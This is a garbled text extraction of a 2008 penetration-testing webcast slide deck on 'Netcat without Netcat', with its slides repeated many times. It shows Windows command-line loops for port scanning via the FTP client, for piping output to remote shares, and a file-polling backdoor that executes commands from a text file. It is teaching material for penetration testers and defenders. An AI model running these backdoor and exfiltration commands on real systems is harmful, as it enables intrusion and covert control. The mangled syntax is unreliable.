bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 27
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 28
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 29
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 30
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 31
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 32
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
